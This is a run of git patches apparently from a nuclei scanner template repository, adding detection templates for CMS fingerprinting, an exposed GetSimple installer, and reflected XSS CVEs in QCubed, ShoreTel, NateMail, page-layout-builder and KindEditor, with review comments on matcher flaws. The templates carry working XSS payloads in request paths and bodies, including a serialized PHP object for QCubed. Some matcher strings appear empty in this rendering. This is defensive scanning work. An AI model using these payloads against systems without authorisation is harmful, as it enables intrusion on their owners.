@@ -0,0 +1,23 @@ +id: shopizer-detect + +info: + name: Shopizer Detection + author: pikpikcu + severity: info + tags: tech,shopizer + +requests: + - method: GET + path: + - "{{BaseURL}}/shop/" + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - 'Powered by Date: Wed, 15 Sep 2021 12:30:08 +0700 Subject: [PATCH 289/339] Create getsimple-cms-detect.yaml --- technologies/getsimple-cms-detect.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 technologies/getsimple-cms-detect.yaml diff --git a/technologies/getsimple-cms-detect.yaml b/technologies/getsimple-cms-detect.yaml new file mode 100644 index 0000000000..175287a663 --- /dev/null +++ b/technologies/getsimple-cms-detect.yaml @@ -0,0 +1,22 @@ +id: getsimple-cms-detect + +info: + name: GetSimple CMS Detection + author: pikpikcu + severity: info + tags: tech,getsimple + +requests: + - method: GET + path: + - "{{BaseURL}}/admin/index.php" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "GetSimple CMS" From bb8e0616e97ed2471010906361e7a686a4f084ff Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Wed, 15 Sep 2021 13:00:51 +0700 Subject: [PATCH 290/339] Create CVE-2020-24912.yaml --- cves/2020/CVE-2020-24912.yaml | 38 +++++++++++++++++++++++++++++++++++ 1 file changed, 38 insertions(+) create mode 100644 cves/2020/CVE-2020-24912.yaml diff --git a/cves/2020/CVE-2020-24912.yaml b/cves/2020/CVE-2020-24912.yaml new file mode 100644 index 0000000000..6978460d19 --- /dev/null +++ b/cves/2020/CVE-2020-24912.yaml 
@@ -0,0 +1,38 @@ + +id: CVE-2020-24912 + +info: + name: QCube Cross-Site-Scripting + author: pikpikcu + severity: medium + description: reflected cross-site scripting (XSS) vulnerability in qcubed (all versions including 3.1.1) in profile.php via the stQuery-parameter allows unauthenticated attackers to steal sessions of authenticated users. + reference: + - https://www.ait.ac.at/themen/cyber-security/pentesting/security-advisories/ait-sa-20210215-03 + - https://nvd.nist.gov/vuln/detail/CVE-2020-24912 + - https://www.ait.ac.at/themen/cyber-security/pentesting/security-advisories/ait-sa-20210215-03 + - http://seclists.org/fulldisclosure/2021/Mar/30 + tags: cves,cve2020,qcubed,xss + +requests: + - method: POST + path: + - "{{BaseURL}}/assets/_core/php/profile.php" + - "{{BaseURL}}/assets/php/profile.php" + - "{{BaseURL}}/vendor/qcubed/qcubed/assets/php/profile.php" + headers: + Content-Type: application/x-www-form-urlencoded + body: "intDatabaseIndex=1&StrReferrer=somethinxg&strProfileData=YToxOntpOjA7YTozOntzOjEyOiJvYmpCYWNrdHJhY2UiO2E6MTp7czo0OiJhcmdzIjthOjE6e2k6MDtzOjM6IlBXTiI7fX1zOjg6InN0clF1ZXJ5IjtzOjExMjoic2VsZWN0IHZlcnNpb24oKTsgc2VsZWN0IGNvbnZlcnRfZnJvbShkZWNvZGUoJCRQSE5qY21sd2RENWhiR1Z5ZENnbmVITnpKeWs4TDNOamNtbHdkRDRLJCQsJCRiYXNlNjQkJCksJCR1dGYtOCQkKSI7czoxMToiZGJsVGltZUluZm8iO3M6MToiMSI7fX0K=" + + matchers-condition: and + matchers: + + - type: word + words: + - 'strProfileData' + - "YToxOntpOjA7YTozOntzOjEyOiJvYmpCYWNrdHJhY2UiO2E6MTp7czo0OiJhcmdzIjthOjE6e2k6MDtzOjM6IlBXTiI7fX1zOjg6InN0clF1ZXJ5IjtzOjExMjoic2VsZWN0IHZlcnNpb24oKTsgc2VsZWN0IGNvbnZlcnRfZnJvbShkZWNvZGUoJCRQSE5qY21sd2RENWhiR1Z5ZENnbmVITnpKeWs4TDNOamNtbHdkRDRLJCQsJCRiYXNlNjQkJCksJCR1dGYtOCQkKSI7czoxMToiZGJsVGltZUluZm8iO3M6MToiMSI7fX0K=" + part: body + + - type: word + words: + - 'Content-Type: text/html' + part: header From 80072c8e97dd7400ad8aa90114a250bac3519670 Mon Sep 17 00:00:00 2001 
From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Wed, 15 Sep 2021 13:13:50 +0700 Subject: [PATCH 291/339] Create CVE-2020-28351.yaml --- cves/2020/CVE-2020-28351.yaml | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 cves/2020/CVE-2020-28351.yaml diff --git a/cves/2020/CVE-2020-28351.yaml b/cves/2020/CVE-2020-28351.yaml new file mode 100644 index 0000000000..e83c29aa1b --- /dev/null +++ b/cves/2020/CVE-2020-28351.yaml @@ -0,0 +1,31 @@ +id: CVE-2020-28351 + +info: + name: ShoreTel 19.46.1802.0 XSS + author: pikpikcu + severity: medium + description: conferencing component on Mitel ShoreTel 19.46.1802.0 devices could allow an unauthenticated attacker to conduct a reflected cross-site scripting (XSS) attack (via the PATH_INFO to index.php) due to insufficient validation for the time_zone object in the HOME_MEETING& page + reference: + - https://packetstormsecurity.com/files/159987/ShoreTel-Conferencing-19.46.1802.0-Cross-Site-Scripting.html + - https://nvd.nist.gov/vuln/detail/CVE-2020-28351 + tags: cves,cve2020,shoretel,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php/%22%20onmouseover=alert(document.domain)%20?page=HOME" + headers: + Content-Type: application/x-www-form-urlencoded + + matchers-condition: and + matchers: + + - type: word + words: + - 'onmouseover=alert(document.domain)' + part: body + + - type: word + words: + - 'Content-Type: text/html' + part: header From bc6470a65a3cddcae2a03fea55341fa459f83d25 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Wed, 15 Sep 2021 14:10:34 +0700 Subject: [PATCH 292/339] Create CVE-2019-13392.yaml --- cves/2019/CVE-2019-13392.yaml | 38 +++++++++++++++++++++++++++++++++++ 1 file changed, 38 insertions(+) create mode 100644 cves/2019/CVE-2019-13392.yaml diff --git a/cves/2019/CVE-2019-13392.yaml b/cves/2019/CVE-2019-13392.yaml new file mode 100644 index 0000000000..6f097447c2 --- /dev/null 
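Review bot: CVE-2020-28351 has no status matcher, so a 404 or 500 error page that echoes the requested path (common with `index.php/<PATH_INFO>` routing) satisfies both word matchers and is reported as vulnerable; the sibling templates in this series add `- type: status` with `status:` / `- 200`, and the later update of this file in this series still lacks it. The `Content-Type: application/x-www-form-urlencoded` header on a GET with no body is unnecessary. The description is a sentence fragment without a leading article or trailing period; `A conferencing component on Mitel ShoreTel 19.46.1802.0 devices could allow ... page.` would read cleanly.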
+++ b/cves/2019/CVE-2019-13392.yaml @@ -0,0 +1,38 @@ +id: CVE-2019-13392 + +info: + name: MindPalette NateMail 3.0.15 - (XSS) + author: pikpikcu + severity: medium + description: reflected Cross-Site Scripting (XSS) vulnerability in MindPalette NateMail 3.0.15 allows an attacker to execute remote JavaScript in a victim's browser via a specially crafted POST request. The application will reflect the recipient value if it is not in the NateMail recipient array. Note that this array is keyed via integers by default, so any string input will be invalid. + reference: + - https://www.doyler.net/security-not-included/natemail-vulnerabilities + - https://nvd.nist.gov/vuln/detail/CVE-2019-13392 + tags: cves,cve2019,natemail,xss + +requests: + - raw: + - | + POST /NateMail.php HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: application/x-www-form-urlencoded + + recipient=%3cscript%3ealert(document.domain)%3c%2fscript%3e + + matchers-condition: and + matchers: + + - type: word + words: + - '' + part: body + + - type: word + words: + - 'Content-Type: text/html' + part: header + + - type: status + status: + - 200 From d89b82f8102e85b06dab9272a474e85e5cbddebb Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 15 Sep 2021 14:35:51 +0530 Subject: [PATCH 293/339] Update CVE-2021-24342.yaml --- cves/2021/CVE-2021-24342.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/cves/2021/CVE-2021-24342.yaml b/cves/2021/CVE-2021-24342.yaml index 2aaf4ec9f9..6a8299a894 100644 --- a/cves/2021/CVE-2021-24342.yaml +++ b/cves/2021/CVE-2021-24342.yaml @@ -8,7 +8,7 @@ info: reference: - https://wpscan.com/vulnerability/415ca763-fe65-48cb-acd3-b375a400217e - https://nvd.nist.gov/vuln/detail/CVE-2021-24342 - tags: cves,cve2021,wordpress,xss + tags: cves,cve2021,wordpress,xss,wp-plugin requests: - raw: 
@@ -18,14 +18,14 @@ requests: Accept: */* Content-Type: application/x-www-form-urlencoded - lang=en_US&cat_id=6">&action=jnews_build_mega_category_2&number=6&tags=70%2C64%2C10%2C67 + lang=en_US&cat_id=6">&action=jnews_build_mega_category_2&number=6&tags=70%2C64%2C10%2C67 matchers-condition: and matchers: - type: word words: - - '' + - '' part: body - type: word From 1a50ce7b865700967e3801c7c9c7dec990e706f5 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 15 Sep 2021 14:39:45 +0530 Subject: [PATCH 294/339] Update shopizer-detect.yaml --- technologies/shopizer-detect.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/technologies/shopizer-detect.yaml b/technologies/shopizer-detect.yaml index 3989e78c19..76636075ff 100644 --- a/technologies/shopizer-detect.yaml +++ b/technologies/shopizer-detect.yaml @@ -9,8 +9,8 @@ info: requests: - method: GET path: - - "{{BaseURL}}/shop/" - "{{BaseURL}}" + - "{{BaseURL}}/shop/" matchers-condition: and matchers: @@ -21,3 +21,4 @@ requests: - type: word words: - 'Powered by Date: Wed, 15 Sep 2021 17:31:01 +0700 Subject: [PATCH 295/339] Create CVE-2016-1000141.yaml --- cves/2016/CVE-2016-1000141.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2016/CVE-2016-1000141.yaml diff --git a/cves/2016/CVE-2016-1000141.yaml b/cves/2016/CVE-2016-1000141.yaml new file mode 100644 index 0000000000..c02f8e592a --- /dev/null +++ b/cves/2016/CVE-2016-1000141.yaml 
@@ -0,0 +1,29 @@ +id: CVE-2016-1000141 + +info: + name: MiniMax <= 2.0.2 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000141 + tags: cve,cve2016,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/page-layout-builder/includes/layout-settings.php?layout_settings_id=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 40b630e5cd8196d7350a259b654151bb053bfdf9 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 15 Sep 2021 10:50:34 +0000 Subject: [PATCH 296/339] Auto Generated CVE annotations [Wed Sep 15 10:50:34 UTC 2021] :robot: --- cves/2021/CVE-2021-24342.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/cves/2021/CVE-2021-24342.yaml b/cves/2021/CVE-2021-24342.yaml index 6a8299a894..dccaee5040 100644 --- a/cves/2021/CVE-2021-24342.yaml +++ b/cves/2021/CVE-2021-24342.yaml @@ -9,6 +9,11 @@ info: - https://wpscan.com/vulnerability/415ca763-fe65-48cb-acd3-b375a400217e - https://nvd.nist.gov/vuln/detail/CVE-2021-24342 tags: cves,cve2021,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-24342 + cwe-id: CWE-79 requests: - raw: From 86a369132ede3f59e595b606ff49d940f9dfa16d Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 15 Sep 2021 16:49:18 +0530 Subject: [PATCH 297/339] Update CVE-2020-24912.yaml --- cves/2020/CVE-2020-24912.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/cves/2020/CVE-2020-24912.yaml b/cves/2020/CVE-2020-24912.yaml index 6978460d19..c406a00d11 100644 --- a/cves/2020/CVE-2020-24912.yaml +++ b/cves/2020/CVE-2020-24912.yaml @@ -1,4 +1,3 @@ - id: CVE-2020-24912 info: 
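Review bot: `reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000141` is written as a scalar while every other template in this series writes `reference:` as a list, and the template has no `description:` at all; for consistency use `reference:` followed by `- https://nvd.nist.gov/vuln/detail/CVE-2016-1000141` and add a one-line description naming the reflected `layout_settings_id` parameter. As rendered here the body matcher is `""`, which matches every response; please confirm the file holds the reflected marker.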
@@ -10,7 +9,7 @@ info: - https://www.ait.ac.at/themen/cyber-security/pentesting/security-advisories/ait-sa-20210215-03 - https://nvd.nist.gov/vuln/detail/CVE-2020-24912 - https://www.ait.ac.at/themen/cyber-security/pentesting/security-advisories/ait-sa-20210215-03 - - http://seclists.org/fulldisclosure/2021/Mar/30 + - http://seclists.org/fulldisclosure/2021/Mar/30 tags: cves,cve2020,qcubed,xss requests: From bc1d5674551181f925bc741aed6a7fa523c0df1a Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 15 Sep 2021 16:50:33 +0530 Subject: [PATCH 298/339] Update CVE-2020-24912.yaml --- cves/2020/CVE-2020-24912.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/cves/2020/CVE-2020-24912.yaml b/cves/2020/CVE-2020-24912.yaml index c406a00d11..1e3633256c 100644 --- a/cves/2020/CVE-2020-24912.yaml +++ b/cves/2020/CVE-2020-24912.yaml @@ -8,7 +8,6 @@ info: reference: - https://www.ait.ac.at/themen/cyber-security/pentesting/security-advisories/ait-sa-20210215-03 - https://nvd.nist.gov/vuln/detail/CVE-2020-24912 - - https://www.ait.ac.at/themen/cyber-security/pentesting/security-advisories/ait-sa-20210215-03 - http://seclists.org/fulldisclosure/2021/Mar/30 tags: cves,cve2020,qcubed,xss From 781f09984834ff1ff5eb6b4f24dfdb2f012d6cab Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 15 Sep 2021 16:57:27 +0530 Subject: [PATCH 299/339] Create getsimple-installation.yaml --- exposed-panels/getsimple-installation.yaml | 25 ++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 exposed-panels/getsimple-installation.yaml diff --git a/exposed-panels/getsimple-installation.yaml b/exposed-panels/getsimple-installation.yaml new file mode 100644 index 0000000000..273493ca04 --- /dev/null +++ b/exposed-panels/getsimple-installation.yaml 
@@ -0,0 +1,25 @@ +id: getsimple-installation + +info: + name: GetSimple CMS Installation + author: princechaddha + severity: high + reference: http://get-simple.info/ + tags: getsimple,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/admin/install.php" + + matchers-condition: and + matchers: + - type: word + words: + - "GetSimple » Installation" + - "PHP Version" + condition: and + + - type: status + status: + - 200 From 8d74383b0c13812a2e812d6cd5a8292c6d951e1c Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 15 Sep 2021 17:00:00 +0530 Subject: [PATCH 300/339] Update getsimple-cms-detect.yaml --- technologies/getsimple-cms-detect.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/technologies/getsimple-cms-detect.yaml b/technologies/getsimple-cms-detect.yaml index 175287a663..931a074037 100644 --- a/technologies/getsimple-cms-detect.yaml +++ b/technologies/getsimple-cms-detect.yaml @@ -9,7 +9,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}/admin/index.php" + - "{{BaseURL}}" matchers-condition: and matchers: @@ -19,4 +19,5 @@ requests: - type: word words: - - "GetSimple CMS" + - "Powered by GetSimple" + part: body From 68cdcd3034ec1c98965ff2b73dcf652a17d4e903 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 15 Sep 2021 17:20:24 +0530 Subject: [PATCH 301/339] Update CVE-2020-24912.yaml --- cves/2020/CVE-2020-24912.yaml | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/cves/2020/CVE-2020-24912.yaml b/cves/2020/CVE-2020-24912.yaml index 1e3633256c..26baa66321 100644 --- a/cves/2020/CVE-2020-24912.yaml +++ b/cves/2020/CVE-2020-24912.yaml 
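Review bot: The word `"GetSimple » Installation"` depends on the installer emitting the literal `»` character; if the page source writes it as the `&raquo;` entity, the matcher never fires and the template is silent on exactly the exposed installers it is meant to find. Either add the entity form as a second word in its own matcher, or match `"GetSimple"` and `"Installation"` as two words under the existing `condition: and`. `reference: http://get-simple.info/` points at the product home page rather than anything describing the exposure; a short `description:` stating that an unauthenticated installer is reachable would justify the `high` severity.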
@@ -4,7 +4,7 @@ info: name: QCube Cross-Site-Scripting author: pikpikcu severity: medium - description: reflected cross-site scripting (XSS) vulnerability in qcubed (all versions including 3.1.1) in profile.php via the stQuery-parameter allows unauthenticated attackers to steal sessions of authenticated users. + description: A reflected cross-site scripting (XSS) vulnerability in qcubed (all versions including 3.1.1) in profile.php via the stQuery-parameter allows unauthenticated attackers to steal sessions of authenticated users. reference: - https://www.ait.ac.at/themen/cyber-security/pentesting/security-advisories/ait-sa-20210215-03 - https://nvd.nist.gov/vuln/detail/CVE-2020-24912 @@ -26,8 +26,7 @@ requests: - type: word words: - - 'strProfileData' - - "YToxOntpOjA7YTozOntzOjEyOiJvYmpCYWNrdHJhY2UiO2E6MTp7czo0OiJhcmdzIjthOjE6e2k6MDtzOjM6IlBXTiI7fX1zOjg6InN0clF1ZXJ5IjtzOjExMjoic2VsZWN0IHZlcnNpb24oKTsgc2VsZWN0IGNvbnZlcnRfZnJvbShkZWNvZGUoJCRQSE5qY21sd2RENWhiR1Z5ZENnbmVITnpKeWs4TDNOamNtbHdkRDRLJCQsJCRiYXNlNjQkJCksJCR1dGYtOCQkKSI7czoxMToiZGJsVGltZUluZm8iO3M6MToiMSI7fX0K=" + - "" part: body - type: word From 18534fa69212b240626fe1c35e5ac83fbd7a7e9a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 15 Sep 2021 11:53:20 +0000 Subject: [PATCH 302/339] Auto Generated CVE annotations [Wed Sep 15 11:53:20 UTC 2021] :robot: --- cves/2020/CVE-2020-24912.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/cves/2020/CVE-2020-24912.yaml b/cves/2020/CVE-2020-24912.yaml index 26baa66321..d4d917d90d 100644 --- a/cves/2020/CVE-2020-24912.yaml +++ b/cves/2020/CVE-2020-24912.yaml @@ -10,6 +10,11 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2020-24912 - http://seclists.org/fulldisclosure/2021/Mar/30 tags: cves,cve2020,qcubed,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-24912 + cwe-id: CWE-79 requests: - method: POST From 6539892061287c382028fcb6edbe6fb386112122 Mon Sep 17 00:00:00 2001 
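Review bot: In the `@@ -26,8 +26,7 @@` hunk the product-specific anchor `'strProfileData'` is dropped and the only remaining body word is rendered here as `""`; if the committed value really is an empty string the word matcher matches every body, and under `matchers-condition: and` the template would flag any profile.php that answers the POST at all. If the `<script>…</script>` text was merely stripped in this rendering that concern goes away, but keeping a second, application-specific word (the old `'strProfileData'`, or another string the advisory shows) still prevents a hit on any page that simply echoes the POST body. The POST body itself lies before the hunk, so I could not check that the string it sends is the one the matcher expects.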
From: Prince Chaddha Date: Wed, 15 Sep 2021 17:24:42 +0530 Subject: [PATCH 303/339] Update CVE-2020-28351.yaml --- cves/2020/CVE-2020-28351.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2020/CVE-2020-28351.yaml b/cves/2020/CVE-2020-28351.yaml index e83c29aa1b..d759a88588 100644 --- a/cves/2020/CVE-2020-28351.yaml +++ b/cves/2020/CVE-2020-28351.yaml @@ -13,7 +13,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}/index.php/%22%20onmouseover=alert(document.domain)%20?page=HOME" + - "{{BaseURL}}/index.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E?page=HOME" headers: Content-Type: application/x-www-form-urlencoded @@ -22,7 +22,7 @@ requests: - type: word words: - - 'onmouseover=alert(document.domain)' + - '' part: body - type: word From 19bbdef5397f2e1db3cabd6a4413750b78288972 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 15 Sep 2021 17:29:47 +0530 Subject: [PATCH 304/339] Update CVE-2016-1000141.yaml --- cves/2016/CVE-2016-1000141.yaml | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/cves/2016/CVE-2016-1000141.yaml b/cves/2016/CVE-2016-1000141.yaml index c02f8e592a..2d67f13122 100644 --- a/cves/2016/CVE-2016-1000141.yaml +++ b/cves/2016/CVE-2016-1000141.yaml 
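Review bot: The new path swaps the attribute-break payload (`%22%20onmouseover=…`) for `%3C%2Fscript%3E%3Cscript%3E…`, which only executes when the `index.php/<segment>` value lands in a text or script context; if the reflection point is the quoted attribute the original PoC targeted, the new string sits inertly inside that attribute while the `part: body` word match still succeeds on the literal text, so the template reports a confirmed XSS that does not fire. Worth checking the referenced Packet Storm advisory for the reflection context before changing the payload shape. Also visible in the context lines: `Content-Type: application/x-www-form-urlencoded` is sent on a bodyless GET; dropping that `headers:` block removes a misleading artefact from the request.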
@@ -1,22 +1,23 @@ id: CVE-2016-1000141 info: - name: MiniMax <= 2.0.2 - Reflected Cross-Site Scripting (XSS) + name: Page Layout builder v1.9.3 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: Reflected XSS in wordpress plugin page-layout-builder v1.9.3 reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000141 tags: cve,cve2016,wordpress,xss,wp-plugin requests: - method: GET path: - - "{{BaseURL}}/wp-content/plugins/page-layout-builder/includes/layout-settings.php?layout_settings_id=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22" + - "{{BaseURL}}/wp-content/plugins/page-layout-builder/includes/layout-settings.php?layout_settings_id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From 9e090c8098e865a9fa3d55232115e982faa4d305 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 15 Sep 2021 17:32:32 +0530 Subject: [PATCH 305/339] Update CVE-2019-13392.yaml --- cves/2019/CVE-2019-13392.yaml | 12 ++++-------- 1 file changed, 4 insertions(+), 8 deletions(-) diff --git a/cves/2019/CVE-2019-13392.yaml b/cves/2019/CVE-2019-13392.yaml index 6f097447c2..fe641a6446 100644 --- a/cves/2019/CVE-2019-13392.yaml +++ b/cves/2019/CVE-2019-13392.yaml @@ -18,21 +18,17 @@ requests: Accept: */* Content-Type: application/x-www-form-urlencoded - recipient=%3cscript%3ealert(document.domain)%3c%2fscript%3e + recipient=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E matchers-condition: and matchers: - type: word words: - - '' + - '' part: body - type: word - words: - - 'Content-Type: text/html' part: header - - - type: status - status: - - 200 + words: + - text/html From f19daba61699aa43244960bfd4c6ac4c94b9ce4e Mon Sep 17 00:00:00 2001 
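Review bot: The rewritten `layout_settings_id=%3C%2Fscript%3E…` drops the `%22%3E` attribute-break the original payload carried, so the request now only demonstrates XSS if the parameter is reflected in a text or script context; if layout-settings.php echoes it inside a quoted attribute (which the old `%22%3E` prefix suggests), the `part: body` word match passes on the inert literal and the template over-reports. Keeping the `%22%3E` prefix, or matching on the break-out characters together with the script tag, ties the match to the context the CVE describes. The new `name: Page Layout builder v1.9.3` reads as a single affected version; if earlier releases are affected as well, writing `<= 1.9.3` avoids a triager skipping older installs.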
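Review bot: The `status: 200` matcher is removed at the same time the header check is relaxed from `'Content-Type: text/html'` to `text/html`, so a 4xx/5xx page that echoes the posted `recipient` value now matches too. If that is deliberate (a payload reflected on an error page is still exploitable), a comment such as `# no status check: reflection on error pages still counts` above `matchers-condition: and` stops the next editor from re-adding it; if not, keep `- type: status` with `- 200`. The raw request this body belongs to begins before the hunk, so the request line and `Host` header were not visible for review.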
From: GitHub Action Date: Wed, 15 Sep 2021 12:04:47 +0000 Subject: [PATCH 306/339] Auto Generated CVE annotations [Wed Sep 15 12:04:47 UTC 2021] :robot: --- cves/2016/CVE-2016-1000141.yaml | 5 +++++ cves/2020/CVE-2020-28351.yaml | 5 +++++ 2 files changed, 10 insertions(+) diff --git a/cves/2016/CVE-2016-1000141.yaml b/cves/2016/CVE-2016-1000141.yaml index 2d67f13122..6450289e6c 100644 --- a/cves/2016/CVE-2016-1000141.yaml +++ b/cves/2016/CVE-2016-1000141.yaml @@ -7,6 +7,11 @@ info: description: Reflected XSS in wordpress plugin page-layout-builder v1.9.3 reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000141 tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000141 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-28351.yaml b/cves/2020/CVE-2020-28351.yaml index d759a88588..11a660996c 100644 --- a/cves/2020/CVE-2020-28351.yaml +++ b/cves/2020/CVE-2020-28351.yaml @@ -9,6 +9,11 @@ info: - https://packetstormsecurity.com/files/159987/ShoreTel-Conferencing-19.46.1802.0-Cross-Site-Scripting.html - https://nvd.nist.gov/vuln/detail/CVE-2020-28351 tags: cves,cve2020,shoretel,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-28351 + cwe-id: CWE-79 requests: - method: GET From 46201a340ba582fe94b100bd2a6acb8522f8f84a Mon Sep 17 00:00:00 2001 From: sandeep Date: Wed, 15 Sep 2021 19:52:49 +0530 Subject: [PATCH 307/339] duplicate template --- technologies/minio-detect.yaml | 22 ---------------------- 1 file changed, 22 deletions(-) delete mode 100644 technologies/minio-detect.yaml diff --git a/technologies/minio-detect.yaml b/technologies/minio-detect.yaml deleted file mode 100644 index aab5ca4231..0000000000 --- a/technologies/minio-detect.yaml +++ /dev/null 
@@ -1,22 +0,0 @@ -id: minio-detect - -info: - name: Minio Detection - author: pdteam - severity: info - tags: tech,minio - -requests: - - method: GET - path: - - "{{BaseURL}}/minio/login" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - "MinIO Browser" \ No newline at end of file From df64158ca6f9348c76ced1f86d01d03d8f1ebc88 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Thu, 16 Sep 2021 10:35:05 +0700 Subject: [PATCH 308/339] Create CVE-2019-7543.yaml --- cves/2019/CVE-2019-7543.yaml | 33 +++++++++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 cves/2019/CVE-2019-7543.yaml diff --git a/cves/2019/CVE-2019-7543.yaml b/cves/2019/CVE-2019-7543.yaml new file mode 100644 index 0000000000..a3c1d32ec5 --- /dev/null +++ b/cves/2019/CVE-2019-7543.yaml @@ -0,0 +1,33 @@ +id: CVE-2019-7543 + +info: + name: KindEditor 4.1.11, the php/demo.php - (XSS) + author: pikpikcu + severity: medium + description: KindEditor 4.1.11, the php/demo.php content1 parameter has a reflected Cross-site Scripting (XSS) vulnerability. + reference: + - https://github.com/0xUhaw/CVE-Bins/tree/master/KindEditor + - https://nvd.nist.gov/vuln/detail/CVE-2019-7543 + tags: cves,cve2019,kindeditor,xss + +requests: + - method: POST + path: + - '{{BaseURL}/kindeditor/php/demo.php' + headers: + Content-Type: application/x-www-form-urlencoded + + body: "content1=&button=%E6%8F%90%E4%BA%A4%E5%86%85%E5%AE%B9" + + matchers-condition: and + matchers: + + - type: word + words: + - '' + part: body + + - type: word + part: header + words: + - text/html From f9fa1b75b33866a826c7e42d22874a00eedc6467 Mon Sep 17 00:00:00 2001 
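Review bot: `'{{BaseURL}/kindeditor/php/demo.php'` has an unbalanced placeholder (one closing brace), so the variable is never expanded and the request is aimed at a literal `{{BaseURL}/…` path that reaches demo.php on no target; it should read `'{{BaseURL}}/kindeditor/php/demo.php'`. The body word is rendered as `''` here; whatever the committed value is, it must be a substring of what `content1=` actually sends, otherwise the reflected payload can never satisfy the matcher. The path also assumes a `/kindeditor/` install prefix — if the editor is commonly vendored elsewhere, a second path such as `'{{BaseURL}}/php/demo.php'` with `stop-at-first-match: true` would cover it.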
From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Thu, 16 Sep 2021 10:51:42 +0700 Subject: [PATCH 309/339] Create php-proxy-detect.yaml --- technologies/php-proxy-detect.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 technologies/php-proxy-detect.yaml diff --git a/technologies/php-proxy-detect.yaml b/technologies/php-proxy-detect.yaml new file mode 100644 index 0000000000..bd3e98a6fd --- /dev/null +++ b/technologies/php-proxy-detect.yaml @@ -0,0 +1,25 @@ +id: php-proxy-detect + +info: + name: PHP Proxy Detect + author: pikpikcu + severity: info + tags: tech,php + +requests: + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/proxy" + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "PHP-Proxy" + + - type: status + status: + - 200 From 20cddde737901c2beb5526d568cf1272c58ba1a3 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Thu, 16 Sep 2021 11:01:39 +0700 Subject: [PATCH 310/339] Create CVE-2016-8527.yaml --- cves/2016/CVE-2016-8527.yaml | 33 +++++++++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 